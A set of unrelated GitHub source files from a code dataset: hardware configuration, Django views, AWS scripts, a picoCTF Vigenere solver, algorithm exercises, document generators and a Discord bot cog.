odrv0.reboot()\nexcept ChannelBrokenException:\n pass\n\nprint('finding odrive...')\nodrv0 = odrive.find_any()\n\n# brake resistance [Ohm]\nodrv0.config.brake_resistance = 10 # gold one, brown one w/purple wires is 5ohm\n\nprint('configuring motor 0...')\nconfig_motor(odrv0.axis0)\n\nprint('configuring motor 1...')\nconfig_motor(odrv0.axis1)\n\nprint('saving config in memory....')\nodrv0.save_configuration()\n\nprint('rebooting...')\ntry:\n odrv0.reboot()\nexcept ChannelBrokenException:\n print('Lost connection because of reboot')\n","repo_name":"alknemeyer/foot-design-project","sub_path":"scripts/config_motors.py","file_name":"config_motors.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73020543874","text":"# 打开两个txt文件,读取内容到两个列表中\nwith open(\"file1.txt\") as file1:\n lines1 = file1.readlines()\nwith open(\"file2.txt\") as file2:\n lines2 = file2.readlines()\n\n# 将两个列���中相同的行保存到一个新的txt文件中\nwith open(\"result.txt\", \"w\") as result_file:\n for line in lines1:\n if line in lines2:\n result_file.write(line)\n","repo_name":"ArrestX/Arrest_py_tools","sub_path":"Others_py_script/compareTxt.py","file_name":"compareTxt.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32341675282","text":"from django.views.decorators.vary import vary_on_cookie\nfrom models import Comic\nfrom nr_utils import render_with_request\nfrom django.http import HttpResponseRedirect, HttpResponsePermanentRedirect\nimport datetime\nfrom django.shortcuts import get_object_or_404\nimport random\n\ndef index(request):\n \"\"\"the front page\"\"\"\n comic = Comic.comics.public().order_by('-date')[0]\n \n return render_with_request(\n \"nr_comics/front.html\",\n {\"comic\": comic},\n request\n )\n\ndef comic(request, slug):\n \"\"\"the page of an individual comic\"\"\"\n comic = get_object_or_404(Comic, sequence=slug)\n return render_with_request(\n \"nr_comics/comic_detail.html\",\n {\"comic\": comic},\n request\n )\n\ndef archive(request):\n return render_with_request(\n \"nr_comics/comic_list.html\",\n {\"comics\": Comic.comics.by_year()},\n request\n )\n\ndef comic_image(request, slug):\n \"\"\"the image for a particular comic\"\"\"\n c = get_object_or_404(Comic, sequence=int(slug))\n return HttpResponsePermanentRedirect(c.comic.url)\n\ndef random_comic(request):\n \"\"\"redirects to a random comic\"\"\"\n return HttpResponseRedirect(\n get_object_or_404(\n Comic,\n sequence=random.randint(1,Comic.last())\n ).get_absolute_url()\n )","repo_name":"0sn/nr_comics","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"13940654898","text":"def veginere(plaintext: str, key: str) -> str:\n ciphertext = str()\n # plain text process\n plaintext = plaintext.upper()\n plaintext = plaintext.replace(\" \", \"\")\n # key process\n key = key.replace(\" \",\"\")\n # encryption\n for i in range(len(plaintext)):\n if (plaintext[i].isalpha()):\n ciphertext += chr((ord(plaintext[i])+ord(key[i%len(key)]))%26 + 65)\n else:\n continue\n return ciphertext\n\ndef de_veginere(ciphertext: str, key: str) -> str:\n plaintext = str()\n #cipher text process\n ciphertext = ciphertext.upper()\n ciphertext = ciphertext.replace(\" \", \"\")\n # key process\n key = key.replace(\" \", \"\")\n # decryption\n key_index = 0\n for i in range(len(ciphertext)):\n if (ciphertext[i].isalpha()):\n shift = ord(key[key_index]) - ord('A') # shift = ord(key) - ord('A')\n plaintext += chr((ord(ciphertext[i])-shift-65)%26+65)\n else:\n plaintext += ciphertext[i]\n key_index = (key_index+1)%len(key)\n return plaintext \n\nif __name__==\"__main__\":\n ciphertext, key = 'UFJKXQZQUNB', 'SOLVECRYPTO'\n flag = de_veginere(ciphertext, key)\n print(f'picoCTF{{{flag}}}')","repo_name":"XD3an/CTF-all-in-one","sub_path":"CTF-write-ups/picoCTF/picoCTF2019/Cryptography/Easy1/flag.py","file_name":"flag.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27129961558","text":"#!/usr/bin/python3\n\nimport boto3\n\n\naws_con=boto3.session.Session(profile_name='cloud_user',region_name='us-east-1')\nec2_cli=aws_con.client('ec2')\nec2_res=aws_con.resource('ec2')\n\n#for instance in ec2_con.describe_instances(Filters=[{'Name': 'architecture','Values': ['x86_64']}]):\nfor instance in ec2_res.instances.all():\n# print(instance)\n print(\n \"Id: {0}\\nPlatform: {1}\\nType: {2}\\nPublic IPv4: {3}\\nAMI: {4}\\nState: {5}\\n\".format(\n instance.id, instance.platform, instance.instance_type, instance.public_ip_address, instance.image.id, instance.state\n )\n )\n\nprint('==========EC2 using Client Objet===========')\nresponse=ec2_cli.describe_instances()\n#print(response)\nfor instance in response['Reservations']:\n for each_instance in instance['Instances']:\n print(each_instance['InstanceId'])\n print('=======================')\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"mkhaire/Python","sub_path":"boto3/listec2.py","file_name":"listec2.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73395648195","text":"import logging\n\nfrom attrs import define, field\nfrom nbtlib import Compound, String, Byte\n\nfrom pymatic.common.container import Container\nfrom pymatic.common.item import Item\nfrom pymatic.common.nbt_object import NBTObject\n\n\n@define(kw_only=True)\nclass ItemStack(NBTObject, Container):\n item: Item\n count: int = field(converter=int)\n slot: int = field(converter=int, default=-1)\n\n _origin: Container = field(default=None)\n\n @property\n def name(self) -> str:\n return self.item.name\n\n @property\n def origin(self):\n return self._origin\n\n @classmethod\n def from_nbt(cls, nbt: Compound | dict) -> 'ItemStack':\n return ItemStack(\n nbt=nbt,\n item=Item[nbt['id']],\n count=nbt['Count'],\n slot=nbt.get('Slot', None)\n )\n\n def to_nbt(self) -> Compound:\n # self.validate()\n\n self.nbt.update(Compound({\n 'id': String(self.name),\n 'Count': Byte(self.count),\n 'Slot': Byte(self.slot)\n }))\n if self.slot == -1:\n del self.nbt['Slot']\n return self.nbt\n\n def validate(self) -> bool:\n res: bool = self._type_validation()\n\n if self.count > self.item.stack_size:\n logging.warning(f'Unexpected stack size for {self}. Expected {self.item.stack_size}')\n res = False\n\n return res\n","repo_name":"kikugie/pymatic","sub_path":"pymatic/common/item_stack.py","file_name":"item_stack.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"5700609176","text":"# SW Expert Academy - 6190번. 정곤이의 단조 증가하는 수\n\n\nT = int(input())\n\nfor tc in range(1, T + 1):\n N = int(input())\n numbers = list(map(int, input().split()))\n result = 0\n for i in range(N - 1):\n for j in range(i + 1, N):\n num = numbers[i] * numbers[j]\n temp = str(num)\n check = True\n for k in range(len(temp) - 1):\n if int(temp[k + 1]) < int(temp[k]):\n check = False\n break\n if check:\n result = max(result, num)\n if result == 0:\n result = -1\n print('#{} {}'.format(tc, result))\n\n","repo_name":"wnstj-yang/Algorithm","sub_path":"SWEA/D3/SWEA_6190.py","file_name":"SWEA_6190.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71335751234","text":"import sys\nnum = int(sys.stdin.readline())\n\ndef cal(num):\n lst = []\n if num%3 == 0:\n a = num/3\n lst.append(a)\n if num%2 == 0:\n b = num/2\n lst.append(b)\n c = num-1\n lst.append(c)\n return lst\n\ndp = {}\n\nlst = [num]\n\nlevel = 0\nwhile min(lst) > 1:\n \n lst2 = []\n for i in lst:\n new = cal(i)\n dp[i] = new\n lst2 += new\n level += 1\n lst = set(lst2)\n if 1 in lst:\n \n break\n\n\nprint(level) \n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"kokoko12334/TIL2","sub_path":"baekjoon/1463.py","file_name":"1463.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"46016206770","text":"import dialog\n\n\nclass User:\n def __init__(self, name, age, sex):\n self.name = name\n self.age = age\n self.sex = sex\n\n prefix = property(doc=\"mariage status prefix\")\n\n @prefix.getter\n def prefix(self):\n if hasattr(self, \"_prefix\"):\n return self._prefix\n if self.sex == \"male\":\n return \"Mr\"\n elif self.age < 22:\n return \"Ms\"\n else:\n return \"Mrs\"\n\n @prefix.setter\n def prefix(self, value):\n if value not in (\"Mr\", \"Ms\", \"Mrs\"):\n raise ValueError(\"enter Mr, Ms or Mrs\")\n else:\n self._prefix = value\n\n @classmethod\n def by_dialog(cls):\n return cls(\n name=dialog.ask_name(),\n age=dialog.ask_age(),\n sex=dialog.ask_sex()\n )\n\n def __repr__(self):\n return \"{prefix} {name} ({age})\".format(\n prefix=self.prefix,\n **self.__dict__\n )\n","repo_name":"Odomontois/di_example","sub_path":"user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5201945178","text":"from docx import Document\nimport gc\n\nimport wx\n\n\nclass WriteWord:\n # base_document = Document()\n # base_document_path = str()\n new_document = Document()\n # new_document_path = str()\n\n def __init__(self, path, excel_document, progress, text):\n # Progress Bar\n self.progress = progress\n self.text = text\n\n # Open base word document\n self.base_document_path = path\n self.base_document = Document(path)\n\n # Create new document\n self.new_document_path = excel_document.get_excel_path().replace('.xlsx', '') + '_new.docx'\n self.new_document.save(self.new_document_path)\n\n self.path = path\n self.population = str(excel_document.get_population())\n\n # Make page, find and replace\n self.copying_page(excel_document.get_population())\n self.find_and_replace(excel_document.get_howmuch(), excel_document.get_numberof())\n\n def find_and_replace(self, excel_howmuch, excel_numberof):\n howmuch = excel_howmuch\n numberof = excel_numberof\n\n howmuch_counter = 0\n numberof_counter = 0\n for p in self.new_document.paragraphs:\n if \"HOWMUCH\" in p.text:\n inline = p.runs\n\n for i in range(len(inline)):\n if \"HOWMUCH\" in inline[i].text:\n text = inline[i].text.replace(\"HOWMUCH\", str(howmuch[howmuch_counter]))\n inline[i].text = text\n howmuch_counter += 1\n\n if \"NUMBEROF\" in p.text:\n inline = p.runs\n\n for i in range(len(inline)):\n if \"NUMBEROF\" in inline[i].text:\n text = inline[i].text.replace(\"NUMBEROF\", str(numberof[numberof_counter]).zfill(len(self.population)))\n inline[i].text = text\n numberof_counter += 1\n\n self.text.SetLabel(\"치환중 \" + str(numberof_counter))\n self.progress.SetValue(numberof_counter)\n wx.Yield()\n\n self.new_document.save(self.new_document_path)\n\n self.text.SetLabel(\"완료 (아마도)\")\n self.progress.SetValue(0)\n\n def copying_page(self, population):\n\n self.progress.SetRange(population)\n\n test = 0\n for counter in range(population):\n for p in self.base_document.element.body:\n self.new_document.element.body.append(p)\n self.base_document = Document(self.base_document_path)\n self.progress.SetValue(test)\n self.text.SetLabel(\"페이지 복사중 \" + str(test))\n wx.Yield()\n test += 1\n\n self.new_document.save(self.new_document_path)\n self.progress.SetValue(0)\n","repo_name":"minarc/WADIZ","sub_path":"WriteWord.py","file_name":"WriteWord.py","file_ext":"py","file_size_in_byte":2748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"656482704","text":"import json\nfrom opensearchpy import OpenSearch, RequestsHttpConnection\nimport boto3\nfrom boto3.dynamodb.conditions import Key, Attr\nfrom datetime import datetime\nimport smtplib\nfrom email.mime.text import MIMEText\n\n\n\ndef os_connection_setup():\n host = \"search-lex-bot-elasticsearch-jz6wdka5rp55mtntkkxqu26vva.us-east-1.es.amazonaws.com\"\n port = 443\n #commented out the authentication as git guardian was throwing an issue.\n #auth = (\"sakthi\", \"\")\n \n client = OpenSearch(\n hosts = [{\"host\": host, \"port\": port}],\n http_auth = auth,\n use_ssl = True,\n verify_certs = True,\n ssl_assert_hostname = False,\n ssl_show_warn = False,\n connection_class = RequestsHttpConnection\n )\n \n return client\n\ndef os_search_query(cuisine, client):\n resp = client.search(\n index=\"restaurants\",\n body={\n \"query\": {\n \"bool\": {\n \"must\": {\n \"match_phrase\": {\n \"cuisine\": cuisine,\n }\n },\n },\n }, \n }\n )\n #print(resp)\n return resp\n\ndef db_query(os_resp):\n items = [] \n print(\"in db_query\")\n dynamodb = boto3.resource('dynamodb')\n table = dynamodb.Table('restaurants')\n #print(os_resp['hits']['hits'])\n for each_data in os_resp['hits']['hits']:\n # print(each_data)\n # print(\"\\n\")\n restaurant_id = each_data['_source']['restaurantId']\n print(restaurant_id)\n cuisine = each_data['_source']['cuisine']\n response = table.query(KeyConditionExpression= Key('id').eq(restaurant_id))\n print(response['Items'])\n #items.append(response['Items'][0])\n return (response['Items'][0])\n #print(\"\\n\")\n #print(items)\n #return items\n \ndef delete_sqs_message(queueUrl, receipt_handle):\n sqs_client = boto3.client(\"sqs\", region_name=\"us-east-1\")\n sqs_client.delete_message(QueueUrl=queueUrl, ReceiptHandle=receipt_handle)\n print('Message deleted')\n \ndef get_message_from_sqs():\n queueUrl = 'https://sqs.us-east-1.amazonaws.com/040944046258/DiningRecommendatio.fifo'\n now = datetime.now()\n current_time = now.strftime(\"%S\")\n sqs_client = boto3.client(\"sqs\", region_name=\"us-east-1\")\n #queue = sqs_client.Queue('https://sqs.us-east-1.amazonaws.com/040944046258/DiningRecommendatio.fifo')\n response = sqs_client.receive_message(\n QueueUrl = queueUrl,\n ReceiveRequestAttemptId=current_time\n )\n print(response)\n print(response['Messages'][0]['Body'])\n delete_sqs_message(queueUrl, response['Messages'][0]['ReceiptHandle'])\n return response['Messages'][0]['Body']\n #return response['Messages'][0]['Body']\n \ndef store_exisiting_recommendation(content):\n print(\"storing existing recommendation\")\n dyno_db_recommend = boto3.resource('dynamodb')\n table = dyno_db_recommend.Table('recommendation')\n table.put_item(Item = {\n 'sessionId': \"1\",\n 'cuisine':content\n })\n \ndef send_email_through_ses(to_emailId, mail_body):\n SENDER = \"violetorigin1999@gmail.com\"\n RECIPIENT = to_emailId\n AWS_REGION = \"us-east-1\"\n client = boto3.client('ses',region_name=AWS_REGION)\n response = client.send_email(\n Destination={'ToAddresses': [RECIPIENT,]},\n Message={\n 'Body': {'Text': {'Data': mail_body}},\n 'Subject': {'Data': \"Restaurant Suggestions\"},\n },\n Source=SENDER\n )\n print(\"Email sent! Message ID:\", ), print(response['MessageId'])\n store_exisiting_recommendation(mail_body)\n \n # try:\n \n # except ClientError as e:\n # print(e.response['Error']['Message'])\n # else:\n # print(\"Email sent! Message ID:\", ),\n # print(response['MessageId'])\n\n# def send_email(mail_body, to_emailId):\n# gmail_user = \"violetorigin1999@gmail.com\"\n# gmail_app_password = \"qcuktepgtxuayjln\"\n# sent_from = gmail_user\n# sent_to = to_emailId # have to change this\n# sent_subject = \"Hello World\"\n# sent_body = \"Its me World\"\n \n# try:\n# msg = MIMEText(mail_body)\n# msg['Subject'] = sent_subject\n# msg['From'] = sent_from\n# msg['To'] = ','.join(sent_to)\n# smtp_server = smtplib.SMTP_SSL('smtp.gmail.com', 465)\n# smtp_server.login(gmail_user, gmail_app_password)\n# smtp_server.sendmail(sent_from, sent_to, msg.as_string())\n# smtp_server.quit()\n# except Exception as exception:\n# print(\"Error: %s!\\n\\n\" % exception)\n\ndef lambda_handler(event, context):\n \n user_resp = get_message_from_sqs()\n print(\"user resp\", user_resp, type(user_resp))\n resp_dict = json.loads(user_resp)\n print(\"resp dict\", resp_dict['Cuisine'], type(resp_dict))\n client = os_connection_setup()\n resp = os_search_query(resp_dict['Cuisine'], client)\n #resp = os_search_query(\"Chinese\", client)\n print(resp, type(resp))\n \n rest_result = db_query(resp)\n #print(rest_result['location'], type(rest_result['location']))\n rest_location_dict = eval(rest_result['location'].replace(\"'\", \"\\\"\")) \n #print(type(rest_location_dict), rest_location_dict)\n #print(\" \".join(rest_location_dict['display_address']))\n mail_body = \"\"\n mail_body += rest_result['name'] + \"\\n\"+ rest_result['cuisine'] +\"\\n\"+ \" \".join(rest_location_dict['display_address']) + \" \\n\"+rest_result['phone']\n\n print(mail_body)\n send_email_through_ses(\"sakthiumamaheswari@gmail.com\", mail_body)\n\n \n return {\n 'statusCode': 200,\n 'body': json.dumps('Hello from Lambda!')\n }\n","repo_name":"sakthiuma/cloud_hw1","sub_path":"lambda function/sqs_opensearch_dynamodb_hw1-816a14f8-0046-4c70-a0e2-90d516c686b7/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":5637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15365128258","text":"import torch\nfrom utils.gen_data import StickerDataset, StickerDatasetTriplet\nfrom utils import process_image\nfrom torch.utils.data import DataLoader\nimport torchvision\nfrom torchvision.models.feature_extraction import get_graph_node_names, create_feature_extractor\nfrom models import cnn\nimport numpy as np\nimport cv2\nfrom torch.utils.mobile_optimizer import optimize_for_mobile\n\nbatch_size = 1\n# input_size = 64\ninput_size = 128\n# input_size = 224\ndevice = \"cuda\"\n\n# testing_data = StickerDataset(img_dir_list=[\"dataset/stickers_png/batch_2_cleaned/\"], input_size=input_size, augmentation=True)\n# testing_data = StickerDataset(img_dir_list=[\"dataset/stickers_png/batch_1_cleaned/\"], input_size=input_size, augmentation=True)\ntesting_data = StickerDatasetTriplet(img_dir_list=[\"dataset/stickers_png/batch_2/\"], input_size=input_size, augment=False)\ntesting_dataloader = DataLoader(testing_data, batch_size=batch_size, shuffle=False)\nmax_label = testing_data.max_label()\ncustom_testing_data = StickerDataset(img_dir_list=[\"dataset/realworld/\"], input_size=input_size, augmentation=False)\ncustom_testing_dataloader = DataLoader(custom_testing_data, batch_size=batch_size, shuffle=False)\n\ndef test_imgs():\n ckpt_path = \"\"\n # ckpt_path = \"outputs/checkpoints/features_202205311834.pt\" # best pre bg fix\n # ckpt_path = \"outputs/checkpoints/features_202206010056.pt\" # best post bg fix\n # ckpt_path = \"outputs/checkpoints/features_202206010154.pt\" # best post aug\n # ckpt_path = \"outputs/checkpoints/features_202206010244.pt\" # best post cnn2 + aug\n # ckpt_path = \"outputs/checkpoints/features_202206010329.pt\" # convnext + aug\n # ckpt_path = \"outputs/checkpoints/features_202206192200.pt\" # best tri cnn2 + aug\n # ckpt_path = \"outputs/checkpoints/features_202206192243.pt\" # best tri2 cnn2 + aug\n # ckpt_path = \"outputs/checkpoints/features_202206230039.pt\" # best tri3 cnn2 + aug\n # ckpt_path = \"outputs/checkpoints/features_202206231757.pt\" # best tri_pariwise1 cnn2 + aug\n # ckpt_path = \"outputs/checkpoints/features_202206280113.pt\" # cnn2 triplet pairwise mimic\n # ckpt_path = \"outputs/checkpoints/features_202206280114.pt\" # convnext triplet pairwise mimic\n # ckpt_path = \"outputs/checkpoints/features_202206282334.pt\" # cnn2 triplet pairwise mimic + warp aug\n # ckpt_path = \"outputs/checkpoints/features_202206282339.pt\" # convnext triplet pairwise mimic + warp aug\n ckpt_path = \"outputs/checkpoints/features_202206300021a.pt\" # cnn2 triplet pairwise mimic + elastic aug\n # ckpt_path = \"outputs/checkpoints/features_202206300018a.pt\" # convnext triplet pairwise mimic + elastic aug\n # ckpt_path = \"outputs/checkpoints/features_202206300021b.pt\" # cnn2 triplet pairwise mimic + elastic aug B\n # ckpt_path = \"outputs/checkpoints/features_202206300018b.pt\" # convnext triplet pairwise mimic + elastic aug B\n \n \n # labels = 117\n # labels = 154\n labels = 271\n \n # model = cnn.cnn1(labels = labels)\n # model = cnn.cnn2(labels = labels)\n model = cnn.cnn2_deploy()\n # model = torchvision.models.convnext_small(pretrained=False, num_classes=labels)\n # model._modules[\"features\"][0][0] = torch.nn.Conv2d(1, 96, kernel_size=(4, 4), stride=(4, 4))\n model.load_state_dict(torch.load(ckpt_path, map_location=torch.device(device)))\n model.to(device)\n model.eval()\n\n # train_nodes, eval_nodes = get_graph_node_names(model)\n # print(train_nodes)\n # exit()\n\n feature_out = create_feature_extractor(model, {'fc2':\"features_layer\"})\n # feature_out = create_feature_extractor(model, {'classifier.2':'features_layer'})\n cos = torch.nn.CosineSimilarity(dim=1)\n\n features_list = []\n label_to_path_dict = dict()\n for (test_data, _, _, test_label, _, test_data_path) in testing_dataloader:\n test_data = test_data.to(device)\n test_data = torch.repeat_interleave(test_data, 3, 1)\n # print(test_data.shape)\n # exit()\n \n # traced_script_module = torch.jit.trace(model, test_data)\n # traced_script_module_optimized = optimize_for_mobile(traced_script_module)\n # traced_script_module_optimized._save_for_lite_interpreter(\"models/mobile_model.ptl\")\n # exit()\n\n # test classification accuracy, only for training dataset\n # logits = model(test_data)\n # pred_probs = torch.nn.Softmax(dim=1)(logits)\n # y_pred = pred_probs.argmax(1)\n # print(y_pred == test_labels)\n\n features = feature_out(test_data)['features_layer']\n features_list.append(features.detach())\n label_to_path_dict[str(test_label.item())] = test_data_path[0]\n features_arr = torch.cat(features_list, 0)\n # features_arr_np = features_arr.cpu().detach().numpy()\n # print(features_arr_np.shape)\n # features_arr_np = features_arr_np.astype(\">f2\")\n # features_arr_np.tofile(\"models/features_db.bin\")\n # exit()\n\n cos_n_correct = 0\n dist_n_correct = 0\n cos_top5_n_correct = 0\n dists_top5_n_correct = 0\n for (_, test_data, _, test_label, _, _) in testing_dataloader:\n # temp = test_data[0][0].detach().numpy()\n # temp = (temp*255.0).astype(np.uint8)\n # process_image.preview_img(temp)\n # exit()\n test_data = test_data.to(device)\n test_label = test_label.to(device)\n features = feature_out(test_data)['features_layer']\n features = features.detach()\n\n cos_sim = cos(features, features_arr)\n dist = torch.sum(torch.sub(features, features_arr) ** 2, dim=1)\n # print(dist[0])\n\n cos_preds = torch.argsort(cos_sim, descending=True)[:5]\n dist_preds = torch.argsort(dist, descending=False)[:5]\n\n cos_n_correct += (test_label == cos_preds[0])\n dist_n_correct += (test_label == dist_preds[0])\n cos_top5_n_correct += (test_label in cos_preds)\n dists_top5_n_correct += (test_label in dist_preds)\n cos_acc = (cos_n_correct/len(testing_data)).item()\n dist_acc = (dist_n_correct/len(testing_data)).item()\n cos_top5_acc = cos_top5_n_correct/len(testing_data)\n dist_top5_acc = dists_top5_n_correct/len(testing_data)\n print(cos_acc)\n print(dist_acc)\n print(cos_top5_acc)\n print(dist_top5_acc)\n\n \n for (test_data, _, test_data_path) in custom_testing_dataloader:\n test_data = test_data.to(device)\n features = feature_out(test_data)['features_layer']\n features = features.detach()\n\n cos_sim = cos(features, features_arr)\n dist = torch.sum(torch.sub(features, features_arr) ** 2, dim=1)\n\n cos_preds = torch.argsort(cos_sim, descending=True)[:5]\n dist_preds = torch.argsort(dist, descending=False)[:5]\n\n print(test_data_path)\n print(cos_preds)\n print(dist_preds)\n\n return\n\ntest_imgs()","repo_name":"arawndinog/stickersearch","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":6864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10103289269","text":"import os\nimport sys\nimport pandas as pd\n\ninput('Press Enter to exit...')\ndef app_path():\n if hasattr(sys, 'frozen'):\n return os.path.dirname(sys.executable) # 使用pyinstaller打包后的exe目录\n return os.path.dirname(__file__) # 没打包前的py目录\n\n\nimport winreg\ndef desktop_path():\n key = winreg.OpenKey(winreg.HKEY_CURRENT_USER,\n r'Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders')\n desktop = winreg.QueryValueEx(key, \"Desktop\")[0]\n print(desktop)\n return desktop\n\nfrom docx import Document\ndef delete_paragraph(paragraph):\n p = paragraph._element\n p.getparent().remove(p)\n p._p = p._element = None\ndesktop_path = desktop_path()\ndoc = Document(desktop_path + \"\\日本海外仓箱标\\日本海外仓箱标模板.docx\")\ndf = pd.read_excel(desktop_path + \"\\日本海外仓箱标\\需生成的数据文件.xlsx\")\ndf_data = pd.DataFrame()\nfor i in df.index:\n xiangshu = int(df.loc[i, \"箱数\"])\n sku = df.loc[i, \"品名\"]\n num = int(df.loc[i, \"单箱数量\"])\n zimu = df.loc[i, \"字母标签\"]\n code = df.loc[i, \"箱子编号\"]\n if xiangshu > 1:\n df_tmp = pd.DataFrame({\"品名\": sku, \"箱子编号\": code, '字母标签': zimu, \"单箱数量\": num}, index=[0])\n for n in range(0, xiangshu):\n df_data = df_data.append(df_tmp)\n else:\n df_tmp = pd.DataFrame({\"品名\": sku, \"箱子编号\": code, '字母标签': zimu, \"单箱数量\": num}, index=[0])\n df_data = df_data.append(df_tmp)\n\ndf_data = df_data.reset_index()\nsku_list = df_data['品名'].tolist()\nnum_list = df_data['单箱数量'].tolist()\nzimu_list = df_data['字母标签'].tolist()\ncode_list = df_data['箱子编号'].tolist()\nlist1 = doc.paragraphs\nfor i in list1:\n delete_paragraph(i)\n if (len(doc.paragraphs)) == len(sku_list):\n break\n\ndoc.save(desktop_path + \"\\日本海外仓箱标\\日本海外仓箱标.docx\")\ndoc = Document(desktop_path + \"\\日本海外仓箱标\\日本海外仓箱标.docx\")\nchildren = doc.element.body.iter()\ncount = 0 # 写一个count是为了,可以定位是哪个文本框,因为我用索引失败了\nfor child in children:\n # 通过类型判断目录\n if child.tag.endswith('txbx'):\n count += 1\n if count == 3:\n for ci in child.iter():\n if ci.tag.endswith('main}r'):\n if ci.text == '型号:':\n ci.text = ''\n if ci.text == '字母区分:':\n ci.text = ''\n if ci.text == '数量:':\n ci.text = ''\n if ci.text == '箱子编号:':\n ci.text = ''\ndoc.save(desktop_path + \"\\日本海外仓箱标\\日本海外仓箱标.docx\")\ndoc = Document(desktop_path + \"\\日本海外仓箱标\\日本海外仓箱标.docx\")\nsku_dict = {}\nfor i in range(1, (len(sku_list) * 2) + 1):\n if i == 1:\n sku_dict[1] = 1\n elif i % 2 == 0:\n sku_dict[i] = sku_dict[i - 1]\n else:\n sku_dict[i] = sku_dict[i - 1] + 1\nm = 1\nn = 0\nchildren = doc.element.body.iter()\nfor child in children:\n # 通过类型判断目录\n if child.tag.endswith('txbx'):\n for ci in child.iter():\n if ci.tag.endswith('main}r'):\n if ci.text == '型号:':\n # print(ci.text)\n ci.text = \"型号:%s\" % sku_list[n]\n if ci.text == '字母区分:':\n # print(ci.text)\n ci.text = \"字母区分:%s\" % zimu_list[n]\n if ci.text == '数量:':\n # print(ci.text)\n ci.text = \"数量:%s\" % num_list[n]\n if ci.text == '箱子编号:':\n # print(ci.text)\n ci.text = \"箱子编号:\\n%s\" % code_list[n]\n n += 1\n print(\"正在生成\")\n\ndoc.save(desktop_path + \"\\日本海外仓箱标\\日本海外仓箱标生成完毕.docx\")\n\n\ninput('Press Enter to exit...')","repo_name":"asd851472957/djangoProject","sub_path":"djangoProject/xiangbiaotest.py","file_name":"xiangbiaotest.py","file_ext":"py","file_size_in_byte":4056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14410237438","text":"__author__ = \"Sairam\"\n\nimport json\nimport random\nimport re\nfrom typing import Optional\n\nimport discord\nimport wikipedia\nfrom discord.ext import commands\n\n\nclass Fun(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n async def cog_check(self, ctx):\n if ctx.channel.type == discord.ChannelType.private:\n return True\n if await self.bot.is_owner(ctx.author):\n return True\n guild_data = json.load(open(self.bot.guilds_json))\n enabled = guild_data[str(ctx.guild.id)][\"enabled\"]\n if f\"Bot.cogs.{self.qualified_name}\" in enabled:\n return True\n return False\n\n @commands.command(name='99!', help='Gives a random brooklyn 99 quote!')\n async def _99(self, ctx: discord.ext.commands.context.Context):\n brooklyn_99_quotes = [\n 'I\\'m the human form of the 💯 emoji.',\n 'Bingpot!',\n (\n 'Cool. Cool cool cool cool cool cool cool, '\n 'no doubt no doubt no doubt no doubt.'\n )\n ]\n response = random.choice(brooklyn_99_quotes)\n await ctx.send(response)\n\n @commands.command(name='8ball', help='Answers your questions! ;)')\n async def _8ball(self, ctx: discord.ext.commands.context.Context, *, question):\n replies = [\n \"As I see it, yes.\",\n \"Ask again later.\",\n \"Better not tell you now.\",\n \"Cannot predict now.\",\n \"Concentrate and ask again.\",\n \"Don’t count on it.\",\n \"It is certain.\",\n \"It is decidedly so.\",\n \"Most likely.\",\n \"My reply is no.\",\n \"My sources say no.\",\n \"Outlook not so good.\",\n \"Outlook good.\",\n \"Reply hazy, try again.\",\n \"Signs point to yes.\",\n \"Very doubtful.\",\n \"Without a doubt.\",\n \"Yes.\",\n \"Yes – definitely.\",\n \"You may rely on it.\"\n ]\n await ctx.send(\n f'Question: {question}\\n'\n f'Answer: {random.choice(replies)}'\n )\n\n @commands.command(aliases=['announce'], usage='[content]')\n async def say(self, ctx, channel: Optional[discord.TextChannel] = None, *, message: str = None):\n \"\"\"Say a message\"\"\"\n channel = ctx.channel if channel is None else channel\n emojis = re.findall(r':(.*?):', str(message))\n new_msg = str(message)\n for a in emojis:\n rep = f\":{a}:\"\n emoji = discord.utils.get(ctx.guild.emojis, name=a)\n if emoji is not None:\n if emoji.animated:\n new_msg = (new_msg.replace(rep, f\"\"))\n else:\n new_msg = (new_msg.replace(rep, f\"<:\\_:{emoji.id}>\"))\n else:\n continue\n await channel.send(new_msg)\n await ctx.message.delete()\n\n # @say.error\n # async def error_say(self, ctx, error):\n # \tif isinstance(error, discord.HTTPException):\n # \t\tawait ctx.send(f\"Message is not filled. Please send the message to be sent. {ctx.author.mention}\")\n\n @commands.command(name='spaceit!', help=\"Add a space between each letter!\")\n async def space_it(self, ctx: commands.Context, *, message: str):\n await ctx.send(\" \".join(message))\n\n @commands.command(name='randomizecase', help=\"Randomizes each letter into capital or small\", 